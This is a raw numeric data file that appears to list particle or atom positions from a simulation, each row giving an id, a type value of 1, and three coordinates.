373 1 0.630369 0.376981 0.253648
376 1 0.627152 0.440744 0.312374
1299 1 0.56074 0.503584 0.309368
1301 1 0.627739 0.500863 0.249164
1525 1 0.626846 0.875706 0.374005
247 1 0.687605 0.378971 0.188348
251 1 0.816702 0.374796 0.191324
252 1 0.751907 0.438688 0.190764
374 1 0.687907 0.441711 0.247966
375 1 0.691284 0.377807 0.31381
377 1 0.756052 0.373455 0.250226
378 1 0.812192 0.435866 0.254067
379 1 0.811052 0.379165 0.311514
380 1 0.746239 0.439716 0.309231
1303 1 0.687375 0.502855 0.310039
255 1 0.938987 0.372358 0.186859
256 1 0.874585 0.434938 0.190311
381 1 0.876132 0.373183 0.24982
382 1 0.939547 0.435715 0.249803
383 1 0.940315 0.374917 0.309483
384 1 0.877112 0.432247 0.313713
1528 1 0.626326 0.941703 0.437469
1171 1 0.560198 0.503369 0.190573
1176 1 0.629624 0.569354 0.183701
1203 1 0.564167 0.625842 0.187202
1298 1 0.565303 0.566679 0.248547
1304 1 0.625224 0.560892 0.312594
1331 1 0.563836 0.624798 0.308937
1333 1 0.6295 0.621272 0.251887
1307 1 0.813554 0.494678 0.315562
1175 1 0.690326 0.500886 0.184464
1179 1 0.818176 0.502332 0.187223
1305 1 0.754885 0.503189 0.250601
1180 1 0.747396 0.559749 0.178471
1207 1 0.690935 0.625492 0.187462
1211 1 0.80858 0.627457 0.186713
1302 1 0.689262 0.556031 0.247502
1306 1 0.809424 0.563652 0.252903
1308 1 0.746103 0.561675 0.307773
1335 1 0.687871 0.6278 0.316868
1337 1 0.748447 0.624246 0.250279
1339 1 0.811867 0.624245 0.313207
1183 1 0.942947 0.497219 0.190815
1311 1 0.935515 0.499938 0.313956
1309 1 0.872336 0.499664 0.255478
1184 1 0.878004 0.558334 0.18806
1215 1 0.932909 0.623217 0.19029
1310 1 0.936606 0.559162 0.250335
1312 1 0.874764 0.565642 0.31578
1341 1 0.866591 0.620323 0.248564
1343 1 0.932963 0.626077 0.316859
1522 1 0.5613 0.933637 0.37552
1523 1 0.56598 0.878902 0.439201
530 1 0.558157 0.0635147 0.497017
1208 1 0.62729 0.683205 0.182406
1235 1 0.563978 0.753216 0.185366
1240 1 0.626695 0.814612 0.188029
1330 1 0.564838 0.687784 0.249435
1336 1 0.626283 0.689862 0.311601
1362 1 0.560157 0.809616 0.247972
1363 1 0.568586 0.752848 0.316687
1365 1 0.627499 0.748197 0.249301
1368 1 0.630481 0.815408 0.31868
25 1 0.743762 0.00530171 -0.00434486
1332 1 0.504929 0.694435 0.307064
1472 1 0.874234 0.693798 0.438284
1212 1 0.752717 0.688854 0.184415
1239 1 0.689571 0.757897 0.191435
1243 1 0.814315 0.750896 0.192066
1244 1 0.747304 0.814934 0.191123
1334 1 0.688464 0.68811 0.243511
1338 1 0.813803 0.686647 0.252243
1340 1 0.753326 0.692242 0.314621
1366 1 0.689818 0.818837 0.255166
1367 1 0.688748 0.752748 0.315006
1369 1 0.752134 0.750355 0.256118
1370 1 0.808156 0.814049 0.252722
1371 1 0.812666 0.753459 0.318654
1372 1 0.749297 0.813962 0.31357
1503 1 0.93913 0.750093 0.44067
1216 1 0.870858 0.688393 0.191009
1247 1 0.932469 0.751796 0.193049
1248 1 0.876798 0.813966 0.188085
1342 1 0.932146 0.689624 0.248402
1344 1 0.874926 0.688589 0.31051
1373 1 0.87476 0.753937 0.25347
1374 1 0.940045 0.818557 0.251944
1375 1 0.940855 0.750224 0.315017
1376 1 0.877197 0.814635 0.315132
1621 1 0.625842 0.754317 0.502859
257 1 1.00056 1.00335 0.251495
1501 1 0.87711 0.751429 0.374278
275 1 0.562135 0.00157285 0.316362
1267 1 0.558077 0.875087 0.192856
1272 1 0.627612 0.935189 0.191423
1394 1 0.562675 0.937239 0.245528
1395 1 0.562815 0.877199 0.312535
1397 1 0.625178 0.871771 0.252176
1400 1 0.621324 0.93477 0.311059
1504 1 0.877075 0.807644 0.437581
279 1 0.685421 0.99602 0.313104
155 1 0.810611 0.999327 0.186718
1271 1 0.688447 0.872861 0.189733
1275 1 0.813736 0.874178 0.186308
1276 1 0.745509 0.936299 0.194416
1398 1 0.68642 0.936438 0.254259
1399 1 0.689264 0.877546 0.314222
1401 1 0.749206 0.879059 0.251246
1402 1 0.807056 0.936569 0.253101
1403 1 0.811045 0.873497 0.315128
1404 1 0.751885 0.943789 0.316185
287 1 0.938713 0.000483162 0.308656
1279 1 0.938701 0.873123 0.190021
1280 1 0.872766 0.941256 0.189545
1405 1 0.874899 0.874592 0.245922
1406 1 0.929566 0.937995 0.250949
1407 1 0.933783 0.879961 0.314496
1408 1 0.877066 0.941669 0.314366
1380 1 0.998659 0.941054 0.312307
402 1 0.558265 0.060602 0.375813
408 1 0.620313 0.0682182 0.437008
435 1 0.555667 0.127692 0.435529
437 1 0.622625 0.130653 0.377408
1316 1 0.997946 0.689577 0.318756
1042 1 0.56249 0.564875 -0.00282372
1041 1 0.501524 0.497927 -0.00452964
452 1 1.0021 0.307144 0.438702
1470 1 0.937341 0.689029 0.382574
409 1 0.753021 -0.00092366 0.37568
411 1 0.814901 1.00091 0.435851
406 1 0.683113 0.0623334 0.375204
410 1 0.809491 0.0651039 0.377121
412 1 0.749293 0.061342 0.438738
439 1 0.679536 0.126744 0.442413
441 1 0.746317 0.124035 0.379538
443 1 0.806858 0.127981 0.44535
1172 1 0.50147 0.563695 0.184205
1494 1 0.687964 0.816248 0.380681
1462 1 0.691297 0.690319 0.379678
415 1 0.93017 0.00799177 0.437365
1466 1 0.810122 0.684164 0.380375
1495 1 0.690644 0.756526 0.445918
413 1 0.870813 0.00453861 0.373829
414 1 0.93683 0.0685827 0.375239
416 1 0.873511 0.066177 0.437316
445 1 0.872332 0.127983 0.373344
447 1 0.933267 0.131241 0.439119
601 1 0.751013 0.250811 0.50185
1653 1 0.623233 0.879187 0.504394
472 1 0.630641 0.318209 0.434524
469 1 0.630933 0.246899 0.37193
467 1 0.568244 0.256945 0.436316
434 1 0.564443 0.189482 0.376455
440 1 0.61976 0.189431 0.441288
466 1 0.563533 0.311114 0.371584
1044 1 0.499505 0.561926 0.0637179
442 1 0.805569 0.182486 0.381608
438 1 0.69162 0.183468 0.374521
471 1 0.685088 0.247099 0.440329
473 1 0.751998 0.247862 0.375144
474 1 0.812794 0.316446 0.373299
444 1 0.745523 0.190573 0.440185
475 1 0.80826 0.253556 0.43643
476 1 0.750052 0.315558 0.438847
470 1 0.691867 0.312157 0.374491
1468 1 0.748035 0.68663 0.445906
1499 1 0.811555 0.752183 0.438162
1565 1 0.876794 0.499229 0.499817
1502 1 0.936755 0.812917 0.377779
1498 1 0.812308 0.812212 0.37293
1108 1 0.503369 0.80935 0.0639841
1458 1 0.565434 0.687178 0.370264
566 1 0.681689 0.186346 0.503035
479 1 0.937811 0.248827 0.439996
480 1 0.874524 0.311738 0.441792
478 1 0.935466 0.307722 0.38129
477 1 0.873857 0.248389 0.375406
446 1 0.933488 0.187279 0.377199
448 1 0.868713 0.189084 0.438119
164 1 0.995929 0.181515 0.188601
1490 1 0.563986 0.817228 0.377347
1073 1 0.498721 0.626729 -0.00120564
499 1 0.56465 0.378642 0.435035
504 1 0.628946 0.443282 0.436079
501 1 0.62468 0.373385 0.367899
498 1 0.559649 0.443346 0.374542
1427 1 0.561905 0.505425 0.434401
1429 1 0.624059 0.50078 0.372679
1464 1 0.625624 0.689332 0.436164
508 1 0.747801 0.441489 0.438185
507 1 0.812376 0.377122 0.440751
506 1 0.810007 0.434113 0.378169
505 1 0.751756 0.376641 0.37226
503 1 0.689509 0.377169 0.436528
502 1 0.693328 0.440835 0.374794
1433 1 0.751441 0.501759 0.368061
1435 1 0.810674 0.50166 0.436403
1496 1 0.626953 0.814239 0.440216
1493 1 0.628667 0.75222 0.382282
58 1 0.815506 0.185342 0.00289469
512 1 0.872972 0.441895 0.432139
511 1 0.937802 0.370963 0.43853
510 1 0.937571 0.435915 0.378947
509 1 0.87491 0.370873 0.375597
1439 1 0.935458 0.500094 0.434809
196 1 0.994652 0.306055 0.186161
1426 1 0.567772 0.568696 0.374452
1432 1 0.625505 0.563538 0.438437
1459 1 0.564636 0.631296 0.433894
1461 1 0.626579 0.624993 0.37657
1491 1 0.559137 0.746751 0.438681
1500 1 0.749717 0.818052 0.439105
1431 1 0.691916 0.501164 0.442349
1463 1 0.68841 0.62397 0.439778
1436 1 0.751012 0.564175 0.435274
1434 1 0.810591 0.562142 0.374977
1430 1 0.688389 0.55918 0.375962
1467 1 0.806719 0.626823 0.441497
1465 1 0.749899 0.627537 0.374793
1497 1 0.746086 0.755554 0.373734
1233 1 0.503187 0.755399 0.126017
1437 1 0.875349 0.50203 0.374693
1438 1 0.934309 0.560364 0.37365
1440 1 0.871699 0.560766 0.436652
1469 1 0.870525 0.620823 0.378926
1471 1 0.938264 0.627157 0.434858
1524 1 0.496185 0.940243 0.439518
1633 1 1.00172 0.878616 0.504525
61 1 0.871642 0.119607 0.0011204
308 1 0.499633 0.188804 0.313705
145 1 0.504333 0.994294 0.123138
117 1 0.62515 0.376624 -0.000608342
1145 1 0.74768 0.871998 0.00237672
638 1 0.939468 0.435891 0.492934
1593 1 0.747953 0.625482 0.502839
602 1 0.812945 0.310314 0.496508
1521 1 0.49993 0.87722 0.369943
1618 1 0.562803 0.817464 0.500522
630 1 0.687523 0.438248 0.500669
1113 1 0.753883 0.744308 -0.00149954
1185 1 0.994837 0.621112 0.129289
52 1 0.504674 0.185094 0.0658266
1081 1 0.745937 0.623211 -0.00339365
1045 1 0.620626 0.501386 0.00174516
1489 1 0.501104 0.750688 0.369697
1076 1 0.504736 0.684138 0.0665576
1444 1 0.996142 0.690878 0.436632
193 1 1.00331 0.238795 0.130464
305 1 0.499736 0.12483 0.249097
1284 1 0.998863 0.561875 0.317813
68 1 0.997609 0.315429 0.0636683
1201 1 0.502786 0.622181 0.123368
1217 1 0.999789 0.756978 0.133099
356 1 0.999547 0.439591 0.311844
634 1 0.81745 0.438837 0.498112
565 1 0.616012 0.126036 0.500062
1313 1 0.994137 0.625911 0.250877
1562 1 0.807679 0.559778 0.501099
1300 1 0.498344 0.566131 0.308456
1220 1 1.00136 0.82078 0.189322
1204 1 0.501695 0.686336 0.181146
1409 1 0.999563 0.501652 0.380515
321 1 0.993202 0.245019 0.249001
324 1 0.992403 0.309718 0.313357
273 1 0.500007 0.00198396 0.243554
369 1 0.498232 0.377285 0.25234
417 1 1.00032 0.129007 0.379843
1188 1 0.992419 0.691663 0.186962
241 1 0.502051 0.37949 0.127642
542 1 0.937185 0.0660915 0.500223
65 1 0.995246 0.243345 0.00801298
1597 1 0.876699 0.629893 0.495671
1558 1 0.690422 0.559202 0.499397
570 1 0.809431 0.191819 0.504315
114 1 0.566464 0.439002 0.000394092
541 1 0.871073 0.00384553 0.500574
86 1 0.68729 0.312034 0.00363204
122 1 0.812474 0.438638 -0.000130935
629 1 0.629611 0.378429 0.497702
626 1 0.559494 0.441416 0.494976
1086 1 0.935866 0.683333 0.00237814
1054 1 0.941694 0.558137 0.00338406
29 1 0.870304 0.00348507 0.000223778
93 1 0.875994 0.249718 0.0049311
534 1 0.681723 0.0633942 0.498693
57 1 0.751511 0.127965 0.00476684
593 1 0.505982 0.253682 0.497061
1077 1 0.625851 0.621929 -0.00332039
1662 1 0.935855 0.937067 0.499988
1085 1 0.873431 0.621288 0.00138137
54 1 0.68633 0.183964 0.00610228
1046 1 0.685568 0.559875 0.00519794
85 1 0.624662 0.248726 0.00791486
82 1 0.565603 0.31359 0.00707315
1050 1 0.80921 0.560008 0.00321695
94 1 0.940609 0.308038 0.00391409
536 1 0.625322 0.062472 0.558766
563 1 0.556949 0.125799 0.563134
658 1 0.556974 0.0651907 0.625805
693 1 0.623279 0.121473 0.626061
1716 1 0.502676 0.68355 0.687987
964 1 0.997863 0.313622 0.937494
612 1 0.99744 0.437776 0.563421
605 1 0.871862 0.248038 0.499288
540 1 0.749348 0.0676328 0.56802
567 1 0.682601 0.124021 0.560771
571 1 0.811639 0.130597 0.558475
662 1 0.686986 0.0596153 0.625566
666 1 0.812254 0.0704029 0.624109
697 1 0.745141 0.128796 0.626354
539 1 0.813371 0.00516001 0.565823
535 1 0.684509 0.00879617 0.558864
665 1 0.747587 -0.000768396 0.622979
573 1 0.869875 0.130677 0.5004
544 1 0.870994 0.0698446 0.559107
575 1 0.934832 0.12301 0.563343
670 1 0.941061 0.058981 0.620028
701 1 0.877958 0.129353 0.622136
865 1 0.998904 0.37032 0.746496
2017 1 1.00193 0.872715 0.870714
568 1 0.62191 0.186143 0.559143
595 1 0.559993 0.246587 0.558802
600 1 0.624292 0.315724 0.560503
690 1 0.561991 0.190172 0.618902
722 1 0.5643 0.312528 0.619067
725 1 0.624324 0.252563 0.621387
1630 1 0.934644 0.814651 0.501791
708 1 0.995448 0.310251 0.685878
916 1 0.501195 0.0620524 0.937784
1556 1 0.50485 0.560217 0.554625
572 1 0.745244 0.185298 0.560453
599 1 0.687589 0.251222 0.560771
603 1 0.808188 0.249005 0.562985
604 1 0.75041 0.320739 0.56141
694 1 0.68279 0.183606 0.621421
698 1 0.810656 0.189816 0.624987
726 1 0.692483 0.310118 0.623854
729 1 0.747327 0.247687 0.621291
730 1 0.811239 0.31678 0.620938
594 1 0.564511 0.319748 0.494181
1009 1 0.500801 0.372506 0.874704
576 1 0.87617 0.189442 0.564486
607 1 0.938401 0.255454 0.562257
608 1 0.87255 0.311964 0.563538
702 1 0.934881 0.194001 0.622701
733 1 0.872414 0.250092 0.626786
734 1 0.940491 0.311363 0.623376
657 1 0.501465 -8.35426e-06 0.62827
1626 1 0.810919 0.810424 0.504714
1748 1 0.498836 0.808089 0.684966
627 1 0.560569 0.377551 0.557422
632 1 0.621339 0.43656 0.559066
754 1 0.566227 0.435943 0.623454
757 1 0.62872 0.375508 0.624749
1685 1 0.627772 0.499044 0.618845
948 1 0.502606 0.188208 0.941444
631 1 0.68434 0.379782 0.564112
635 1 0.815663 0.377107 0.556827
636 1 0.753588 0.439804 0.562911
758 1 0.689017 0.444568 0.617908
761 1 0.747615 0.380071 0.623627
762 1 0.816019 0.436476 0.619469
1563 1 0.813404 0.50218 0.558655
1940 1 0.500806 0.558225 0.938726
639 1 0.932937 0.374114 0.565059
640 1 0.878583 0.433338 0.56324
765 1 0.875328 0.375627 0.626322
766 1 0.938332 0.435913 0.625389
1969 1 0.499989 0.626589 0.873156
1812 1 0.501469 0.563651 0.811574
996 1 0.997996 0.43519 0.93533
1555 1 0.564437 0.50315 0.56559
1560 1 0.627349 0.564549 0.564105
1587 1 0.563104 0.628817 0.559946
1682 1 0.564776 0.566266 0.62483
1717 1 0.626337 0.624624 0.624624
2048 1 0.871762 0.938841 0.939904
1078 1 0.683879 0.690427 1.00457
2047 1 0.944842 0.880436 0.933027
1697 1 1.00031 0.623375 0.626068
1559 1 0.689595 0.505491 0.56136
1689 1 0.748269 0.500969 0.622262
1564 1 0.746978 0.563856 0.565633
1591 1 0.686047 0.624792 0.563861
1595 1 0.814867 0.62293 0.557879
1686 1 0.688904 0.566735 0.628971
1690 1 0.817024 0.559547 0.624429
1721 1 0.756174 0.624915 0.628337
1109 1 0.622291 0.751406 1.00274
897 1 0.999246 -0.000199348 0.87137
1636 1 0.99962 0.945255 0.564407
1567 1 0.938298 0.497593 0.555053
1693 1 0.87871 0.499384 0.620143
1568 1 0.878825 0.565272 0.557921
1599 1 0.93702 0.624369 0.558547
1694 1 0.938108 0.560984 0.623898
1725 1 0.878455 0.620249 0.622291
538 1 0.806525 0.0659754 0.498967
801 1 1.00328 0.118854 0.747926
2046 1 0.938885 0.936418 0.872195
1592 1 0.627181 0.687899 0.564434
1619 1 0.56711 0.748129 0.563199
1624 1 0.620577 0.812764 0.564626
1714 1 0.558512 0.686243 0.622796
1746 1 0.558114 0.817806 0.624538
1749 1 0.622949 0.752937 0.623957
1985 1 0.995786 0.750227 0.871195
932 1 0.999549 0.187425 0.938107
1596 1 0.752931 0.68556 0.565132
1623 1 0.692979 0.744269 0.568313
1627 1 0.811505 0.752953 0.569103
1628 1 0.750011 0.811748 0.562083
1718 1 0.685374 0.683351 0.631438
1722 1 0.811315 0.684821 0.62996
1750 1 0.684378 0.812834 0.624209
1753 1 0.748827 0.748821 0.631811
1754 1 0.811281 0.813537 0.620341
769 1 0.999109 1.00139 0.749438
2045 1 0.875785 0.876496 0.875492
1600 1 0.876891 0.685602 0.567467
1631 1 0.940018 0.754874 0.564231
1632 1 0.879106 0.814098 0.56508
1726 1 0.940999 0.687491 0.623961
1757 1 0.883496 0.749336 0.626381
1758 1 0.939541 0.812969 0.629241
692 1 0.500266 0.186378 0.688749
1629 1 0.874021 0.750915 0.506283
661 1 0.622158 0.00449964 0.619363
531 1 0.560233 1.00567 0.56513
1651 1 0.559258 0.879336 0.562622
1656 1 0.62419 0.942147 0.560284
1778 1 0.565557 0.938511 0.624277
1781 1 0.623855 0.874624 0.626736
1665 1 1.00748 0.498998 0.620336
1655 1 0.684187 0.875369 0.564893
1659 1 0.814426 0.871892 0.56137
1660 1 0.742218 0.940053 0.565675
1782 1 0.685652 0.941839 0.623132
1785 1 0.747062 0.869051 0.623618
1786 1 0.80971 0.930268 0.624084
1876 1 0.496342 0.816999 0.810411
543 1 0.932523 1.00281 0.557369
1908 1 0.499746 0.941596 0.811795
705 1 1.00212 0.251947 0.622211
669 1 0.871775 0.00361138 0.623722
1663 1 0.939148 0.874875 0.561579
1664 1 0.875997 0.93799 0.568577
1789 1 0.872542 0.874506 0.626179
1790 1 0.939192 0.932791 0.630551
1681 1 0.503629 0.497027 0.62483
1780 1 0.498765 0.934745 0.679071
804 1 0.997422 0.184158 0.813409
664 1 0.627271 0.0601409 0.685426
691 1 0.565941 0.128575 0.690841
786 1 0.559622 0.0658013 0.748491
792 1 0.627584 0.064903 0.813809
819 1 0.560589 0.125 0.808166
821 1 0.620769 0.130373 0.75405
1589 1 0.623839 0.626579 0.501788
1121 1 0.998939 0.875463 0.999492
533 1 0.618971 0.00292298 0.497034
668 1 0.742139 0.0584481 0.687584
695 1 0.682224 0.12257 0.694772
699 1 0.81052 0.121399 0.693913
790 1 0.689454 0.0626318 0.752552
794 1 0.811836 0.0634171 0.755254
796 1 0.747585 0.0624971 0.819465
823 1 0.688556 0.127147 0.816757
825 1 0.749392 0.122334 0.752643
827 1 0.811429 0.127344 0.813882
667 1 0.812364 1.00063 0.685275
795 1 0.816004 0.999431 0.818825
663 1 0.682667 0.99898 0.689761
2044 1 0.746812 0.941721 0.937823
672 1 0.871814 0.0624039 0.689467
703 1 0.936911 0.12361 0.68494
798 1 0.934803 0.0630345 0.752354
800 1 0.874098 0.0629309 0.807341
829 1 0.874331 0.127244 0.749442
831 1 0.934905 0.123984 0.809759
797 1 0.87674 -0.00247329 0.744326
799 1 0.936047 1.00162 0.813415
671 1 0.939969 0.999533 0.681244
2043 1 0.806757 0.876815 0.940463
562 1 0.56055 0.190649 0.499631
1905 1 0.503122 0.872178 0.74862
696 1 0.61906 0.189812 0.686182
723 1 0.563554 0.251978 0.683638
728 1 0.623487 0.311416 0.687015
818 1 0.565543 0.190244 0.753721
824 1 0.624495 0.186816 0.81336
850 1 0.563858 0.31271 0.748633
851 1 0.562415 0.251142 0.814918
853 1 0.624037 0.250433 0.747587
856 1 0.627397 0.314262 0.8071
1106 1 0.557646 0.816034 1.00007
537 1 0.747764 0.00397396 0.507671
881 1 0.501367 0.378589 0.752078
700 1 0.748854 0.181919 0.691497
727 1 0.688633 0.249179 0.684047
731 1 0.812315 0.245172 0.68564
732 1 0.750013 0.311632 0.688534
822 1 0.682909 0.18638 0.750714
826 1 0.812937 0.187746 0.74981
828 1 0.747349 0.189095 0.814274
854 1 0.684612 0.310711 0.747626
855 1 0.682596 0.254286 0.812538
857 1 0.743739 0.248992 0.752974
858 1 0.812493 0.312174 0.754229
859 1 0.813311 0.247397 0.815295
860 1 0.751907 0.30934 0.818567
2042 1 0.809775 0.931431 0.878068
704 1 0.875345 0.183001 0.685343
735 1 0.935888 0.249331 0.689062
736 1 0.874943 0.312578 0.686174
830 1 0.938798 0.184145 0.748192
832 1 0.877421 0.189836 0.810633
861 1 0.873203 0.251209 0.751017
862 1 0.933223 0.311169 0.753581
863 1 0.937261 0.246006 0.818539
864 1 0.875986 0.311697 0.817803
2041 1 0.753224 0.87313 0.880036
755 1 0.568413 0.377973 0.682617
760 1 0.630767 0.439139 0.679265
882 1 0.570177 0.437219 0.744051
883 1 0.570915 0.375776 0.808601
885 1 0.63012 0.375877 0.742863
888 1 0.633499 0.435155 0.809437
1683 1 0.558615 0.499968 0.687144
1813 1 0.621802 0.498097 0.74813
2039 1 0.693006 0.877149 0.937045
759 1 0.693425 0.370259 0.690498
763 1 0.812873 0.371135 0.683095
764 1 0.756854 0.437174 0.688998
886 1 0.692636 0.438108 0.749422
887 1 0.689366 0.368 0.809596
889 1 0.757108 0.376778 0.75229
890 1 0.816451 0.438146 0.758123
891 1 0.816428 0.374932 0.814084
892 1 0.749291 0.438011 0.815293
1691 1 0.817056 0.500862 0.685414
1687 1 0.693493 0.496023 0.684844
1815 1 0.688592 0.501278 0.806312
1601 1 0.998189 0.754268 0.502528
767 1 0.933847 0.369134 0.68879
768 1 0.871057 0.436601 0.688753
893 1 0.870529 0.378615 0.753002
894 1 0.943409 0.436824 0.743745
895 1 0.937449 0.373579 0.80945
896 1 0.874899 0.441281 0.81802
1823 1 0.942449 0.494705 0.81412
1695 1 0.938484 0.498794 0.68575
2038 1 0.691888 0.937276 0.873613
1811 1 0.559121 0.50428 0.817591
1688 1 0.62612 0.560816 0.694434
1715 1 0.564187 0.622806 0.687051
1810 1 0.562691 0.560746 0.7513
1816 1 0.627087 0.560966 0.810439
1843 1 0.559977 0.621766 0.814617
1845 1 0.623712 0.623612 0.751228
1729 1 1.00013 0.747548 0.630251
1819 1 0.81315 0.49982 0.818719
1817 1 0.758853 0.494661 0.754225
1692 1 0.752753 0.559629 0.688283
1719 1 0.687413 0.622474 0.688208
1723 1 0.813085 0.621628 0.688465
1814 1 0.692384 0.557774 0.747116
1818 1 0.812081 0.559051 0.752692
1820 1 0.753566 0.56161 0.815999
1847 1 0.685996 0.624265 0.814222
1849 1 0.751825 0.622149 0.751699
1851 1 0.806525 0.629769 0.814625
980 1 0.505173 0.309955 0.938578
1821 1 0.877986 0.496722 0.755167
1696 1 0.878416 0.561154 0.691421
1727 1 0.943979 0.623766 0.690566
1822 1 0.938179 0.557336 0.749561
1824 1 0.875555 0.557864 0.813673
1853 1 0.878844 0.620584 0.753113
1855 1 0.940516 0.621467 0.812577
1970 1 0.562234 0.683599 0.874746
2003 1 0.565206 0.751521 0.931953
919 1 0.684777 -0.000733749 0.937477
915 1 0.56012 0.00314353 0.938457
1720 1 0.620777 0.687804 0.685316
1747 1 0.560711 0.750954 0.685767
1752 1 0.623764 0.80684 0.686901
1842 1 0.564344 0.684536 0.75137
1848 1 0.620227 0.695391 0.818099
1874 1 0.562116 0.809047 0.747475
1875 1 0.557328 0.751046 0.808235
1877 1 0.626192 0.749637 0.750225
1880 1 0.621461 0.814826 0.807445
1657 1 0.748273 0.877904 0.506938
1724 1 0.74805 0.683513 0.69098
1751 1 0.687248 0.747585 0.685905
1755 1 0.809384 0.748575 0.687537
1756 1 0.750784 0.810564 0.684731
1846 1 0.680453 0.684082 0.747696
1850 1 0.810418 0.68499 0.752482
1852 1 0.74561 0.689966 0.80796
1878 1 0.689452 0.808681 0.751353
1879 1 0.686631 0.754991 0.816165
1881 1 0.748396 0.747956 0.751364
1882 1 0.811778 0.807653 0.749222
1883 1 0.807825 0.74864 0.815081
1884 1 0.750378 0.810323 0.814202
1873 1 0.497291 0.750275 0.748411
1728 1 0.876274 0.684836 0.688409
1759 1 0.940906 0.749516 0.687253
1760 1 0.872447 0.815215 0.685213
1854 1 0.939587 0.689197 0.7534
1856 1 0.873771 0.683549 0.818779
1885 1 0.875026 0.748425 0.744299
1886 1 0.93935 0.808856 0.749772
1887 1 0.940536 0.750408 0.805916
1888 1 0.875129 0.805023 0.810404
2035 1 0.556951 0.875988 0.935812
2005 1 0.625805 0.757625 0.872902
2034 1 0.559633 0.939547 0.881616
849 1 0.505127 0.250352 0.750096
787 1 0.558821 0.00642062 0.813555
789 1 0.622831 1.00284 0.751289
659 1 0.562421 0.00203701 0.68384
1779 1 0.561884 0.873383 0.688255
1784 1 0.622887 0.941366 0.686612
1906 1 0.55966 0.940337 0.744563
1907 1 0.565816 0.875564 0.817619
1909 1 0.622652 0.876514 0.748345
1912 1 0.617159 0.944797 0.813923
597 1 0.62102 0.252387 0.500119
791 1 0.688918 0.000783335 0.812899
793 1 0.750694 0.997785 0.747805
1783 1 0.686848 0.871823 0.684479
1787 1 0.811307 0.874835 0.685088
1788 1 0.748542 0.938221 0.682997
1910 1 0.691385 0.936201 0.755806
1911 1 0.688208 0.866743 0.81146
1913 1 0.751226 0.877366 0.749807
1914 1 0.811462 0.937178 0.748253
1915 1 0.812733 0.869273 0.814524
1916 1 0.757647 0.936847 0.811652
676 1 0.999854 0.182777 0.685994
1791 1 0.936226 0.870022 0.688916
1792 1 0.874802 0.940387 0.685478
1917 1 0.870605 0.870524 0.748474
1918 1 0.933182 0.937886 0.750115
1919 1 0.936879 0.874111 0.810951
1920 1 0.871283 0.933245 0.813103
2037 1 0.628068 0.879637 0.873067
569 1 0.743699 0.122476 0.501843
2040 1 0.621598 0.93978 0.937904
914 1 0.560943 0.0674181 0.878163
920 1 0.625091 0.0611309 0.939245
947 1 0.568297 0.128436 0.942293
949 1 0.622393 0.128463 0.877283
2002 1 0.563369 0.814542 0.875334
1604 1 0.99996 0.813945 0.563422
923 1 0.805848 0.0017076 0.938255
921 1 0.744716 1.00342 0.877845
918 1 0.684697 0.0644241 0.878342
922 1 0.814268 0.0646317 0.874942
924 1 0.749963 0.0645557 0.938535
951 1 0.688286 0.12416 0.944795
953 1 0.74636 0.128287 0.875295
955 1 0.810841 0.12852 0.94104
2008 1 0.629585 0.814612 0.940006
925 1 0.870467 1.00266 0.877614
927 1 0.937247 0.00326639 0.93371
926 1 0.939468 0.0634824 0.87061
928 1 0.87102 0.0642136 0.936497
957 1 0.875367 0.120898 0.87383
959 1 0.934677 0.120527 0.936538
1978 1 0.809506 0.682327 0.879261
724 1 0.503809 0.318288 0.689616
2007 1 0.683377 0.744481 0.939626
2012 1 0.747433 0.80837 0.938459
917 1 0.624562 0.00574954 0.874169
2011 1 0.81626 0.745914 0.935858
1974 1 0.685672 0.686945 0.87286
1732 1 1.003 0.811539 0.690171
981 1 0.629624 0.252615 0.877941
984 1 0.626765 0.316597 0.939235
946 1 0.566239 0.186211 0.876354
952 1 0.627737 0.186192 0.941404
978 1 0.570169 0.317655 0.873013
979 1 0.567208 0.252272 0.940322
2009 1 0.745983 0.746627 0.877851
753 1 0.501764 0.375525 0.624536
986 1 0.813331 0.3068 0.875724
982 1 0.687458 0.312745 0.875132
987 1 0.810207 0.24842 0.939045
988 1 0.749635 0.31242 0.937339
983 1 0.68818 0.24945 0.950164
954 1 0.809998 0.186491 0.876473
985 1 0.748975 0.252041 0.875545
956 1 0.748851 0.183594 0.941937
950 1 0.68887 0.187529 0.878488
1949 1 0.87815 0.497724 0.880476
960 1 0.876985 0.187249 0.940719
991 1 0.936117 0.250267 0.941917
990 1 0.939163 0.316104 0.871925
992 1 0.877545 0.312238 0.940899
989 1 0.87271 0.247128 0.882044
958 1 0.936924 0.183863 0.878661
2006 1 0.688937 0.808202 0.877927
1980 1 0.744133 0.686892 0.938205
1141 1 0.626704 0.876756 1.0024
1016 1 0.62572 0.437293 0.937641
1013 1 0.631051 0.371723 0.87399
1011 1 0.562207 0.376738 0.938612
1010 1 0.56888 0.439529 0.872285
1941 1 0.625402 0.500207 0.875065
2010 1 0.814097 0.807761 0.876261
1982 1 0.940689 0.684629 0.88008
1020 1 0.748326 0.437711 0.937416
1019 1 0.810363 0.371185 0.935978
1018 1 0.814029 0.439091 0.875558
1017 1 0.750213 0.374236 0.873206
1014 1 0.689296 0.44098 0.875965
1015 1 0.688852 0.376123 0.937827
1943 1 0.686868 0.501243 0.937859
2015 1 0.937968 0.749522 0.939175
1984 1 0.877805 0.680759 0.938687
1761 1 1.00206 0.875274 0.629442
1024 1 0.87215 0.437322 0.938089
1023 1 0.934393 0.370703 0.941714
1022 1 0.942514 0.435539 0.874602
1021 1 0.8746 0.375117 0.877044
1951 1 0.941059 0.498927 0.936765
1950 1 0.940629 0.560551 0.872508
1796 1 1.00021 0.560498 0.814115
1976 1 0.624748 0.679174 0.934401
2013 1 0.878327 0.746568 0.876442
1625 1 0.750481 0.755356 0.501492
1939 1 0.563477 0.498332 0.939609
1938 1 0.560713 0.563156 0.87779
1944 1 0.627556 0.559827 0.942673
1971 1 0.563215 0.626392 0.937767
1973 1 0.62268 0.625045 0.87347
2016 1 0.872151 0.813186 0.938218
2014 1 0.938355 0.812786 0.876374
1947 1 0.81307 0.499735 0.939189
1945 1 0.747324 0.497183 0.873345
1979 1 0.810351 0.622731 0.940126
1942 1 0.68228 0.564514 0.872138
1946 1 0.815006 0.563061 0.877181
1948 1 0.747778 0.559284 0.941944
1975 1 0.685148 0.620222 0.937031
1977 1 0.751177 0.624491 0.874837
1983 1 0.938361 0.617133 0.936982
1981 1 0.879137 0.620079 0.874074
1952 1 0.874636 0.562907 0.93847
737 1 0.997941 0.373913 0.621445
1117 1 0.879044 0.744647 1.00546
1012 1 0.503286 0.436653 0.935444
884 1 0.505884 0.434705 0.816171
1118 1 0.93839 0.809876 0.997263
1588 1 0.499899 0.688481 0.563406
977 1 0.505543 0.25315 0.876481
833 1 0.998674 0.251342 0.750867
